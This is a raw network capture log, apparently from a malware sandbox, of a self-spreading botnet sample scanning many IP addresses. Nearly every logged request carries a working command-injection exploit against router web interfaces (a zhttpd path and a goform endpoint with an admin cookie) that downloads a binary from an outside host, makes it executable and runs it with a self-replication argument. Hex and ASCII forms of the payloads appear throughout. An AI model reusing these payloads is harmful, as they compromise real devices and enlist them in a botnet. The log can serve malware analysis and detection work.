                                                  Jan 19, 2024 18:23:42.785583973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1378192.168.2.1360760137.242.44.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785650015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1379192.168.2.1360448219.144.78.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785705090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1380192.168.2.1355864132.155.129.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785742044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1381192.168.2.135470836.74.97.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785809040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1382192.168.2.134849476.28.90.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785818100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1383192.168.2.1335812149.239.250.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785871029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1384192.168.2.135532045.0.164.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.785911083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1385192.168.2.1344508120.182.43.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.786410093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1386192.168.2.134009646.180.7.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.786977053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1387192.168.2.1345442104.17.31.468080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.939672947 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:23:43.057816982 CET328INHTTP/1.1 400 Bad Request
                                                  Server: cloudflare
                                                  Date: Fri, 19 Jan 2024 17:23:42 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 155
                                                  Connection: close
                                                  CF-RAY: -
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1388192.168.2.1334758104.27.26.698080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.939707041 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:23:43.057965994 CET328INHTTP/1.1 400 Bad Request
                                                  Server: cloudflare
                                                  Date: Fri, 19 Jan 2024 17:23:42 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 155
                                                  Connection: close
                                                  CF-RAY: -
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1389192.168.2.1359960104.25.164.308080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.057900906 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:23:43.176337004 CET328INHTTP/1.1 400 Bad Request
                                                  Server: cloudflare
                                                  Date: Fri, 19 Jan 2024 17:23:43 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 155
                                                  Connection: close
                                                  CF-RAY: -
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1390192.168.2.1343118112.167.11.868080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.101952076 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1391192.168.2.134596881.133.143.1458080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.270026922 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                                  Jan 19, 2024 18:23:43.483406067 CET897INHTTP/1.0 404 Not Found
                                                  Server: SonicWALL
                                                  Expires: -1
                                                  Cache-Control: no-cache
                                                  Content-type: text/html;charset=UTF-8
                                                  X-Content-Type-Options: nosniff
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 73 70 61 6e 2e 75 72 6c 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 7d 70 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 73 70 61 6e 2e 73 65 72 76 65 72 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 72 6c 22 3e 26 23 78 32 46 3b 67 6f 66 6f 72 6d 26 23 78 32 46 3b 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 3c 2f 73 70 61 6e 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 70 3e 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 3c 70 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 72 76 65 72 22 3e 53 6f 6e 69 63 57 61 6c 6c 20 53 65 72 76 65 72 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>File not found!</title><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; }span.url { text-decoration: underline; }p {margin-left: 3em;}span.server {font-size: smaller;}/*...*/--></style></head><body><h1>File not found!</h1><p>The requested URL <span class="url">&#x2F;goform&#x2F;set_LimitClient_cfg</span> was not found on this server.</p><p>If you entered the URL manually please check your spelling and try again.</p><h2>Error 404</h2><p><span class="server">SonicWall Server</span></p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1392192.168.2.1352616222.210.198.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798032999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1393192.168.2.1359376108.255.213.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798077106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1394192.168.2.133956482.219.149.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798115969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1395192.168.2.135712277.182.169.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798166990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1396192.168.2.1345626123.29.21.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798223019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1397192.168.2.13412965.187.174.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798280954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1398192.168.2.133705469.16.135.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798280954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1399192.168.2.13431165.139.147.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798301935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1400192.168.2.133864868.77.109.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798333883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1401192.168.2.1358242209.42.211.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798382044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1402192.168.2.1346454168.22.135.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798408985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1403192.168.2.134239435.216.144.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798446894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1404192.168.2.134954634.247.109.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798477888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1405192.168.2.1360942108.28.226.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798520088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1406192.168.2.1337608156.66.10.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798552990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1407192.168.2.13457245.45.191.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798603058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1408192.168.2.1360788162.115.174.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798649073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1409192.168.2.133567073.211.108.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798686981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1410192.168.2.1343710210.68.5.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798726082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1411192.168.2.135663214.37.181.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798765898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1412192.168.2.1351880187.89.156.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798801899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1413192.168.2.1336558164.4.232.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798824072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1414192.168.2.133740831.5.59.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.798979044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1415192.168.2.1346646133.79.117.62443
